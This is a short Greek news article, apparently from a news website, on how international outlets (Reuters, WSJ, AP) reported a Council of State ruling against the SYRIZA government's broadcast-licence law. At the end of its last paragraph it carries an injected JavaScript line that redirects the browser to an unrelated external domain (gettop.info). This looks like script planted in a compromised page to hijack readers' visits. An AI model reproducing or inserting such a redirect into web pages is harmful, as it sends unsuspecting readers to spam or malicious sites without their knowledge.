Τα διεθνή ΜΜΕ για την απόφαση του ΣτΕ σχετικά με τις άδειες

0
5

 

Τα διεθνή μέσα ενημέρωσης αναφέρονται με εκτενή δημοσίευματά τους στη χθεσινοβραδινή απόφαση του ΣτΕ και τον αντίκτυπο που έχει στην εικόνα της κυβέρνησης ΣΥΡΙΖΑ.

Το Reuters επισημαίνει, επικαλούμενο ανώνυμες κυβερνητικές πηγές, ότι η απόφαση του δικαστηρίου ενδεχομένως να καθορίσει τις επόμενες πολιτικές κινήσεις του Πρωθυπουργού και να επισπεύσει τον επικείμενο ανασχηματισμό, με στόχο την ανάκαμψη των δημοσκοπικών ποσοστών του ΣΥΡΙΖΑ.

Η Wall Street Journal χαρακτήρισε την απόφαση «σημαντικό πλήγμα» στην κυβέρνηση καθώς το νομοσχέδιο για τις άδειες αποτελούσε την επικοινωνιακή κορωνίδα του ΣΥΡΙΖΑ στη «μάχη» εναντίον της διαφθοράς.

Στο ίδιο κλίμα κινείται και η ανταπόκριση του Associated Press, το οποίο υπογραμμίζει ότι «η απόφαση του δικαστηρίου ανατρέπει πλήρως το νομοσχέδιο της κυβέρνησης». Παράλληλα, προσδίδει ιδιαίτερη σημασία στο γεγονός ότι η Αθήνα καλείται να επιστρέψει στους υπερθεματιστές το ποσό των 246 εκατ. ευρώ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here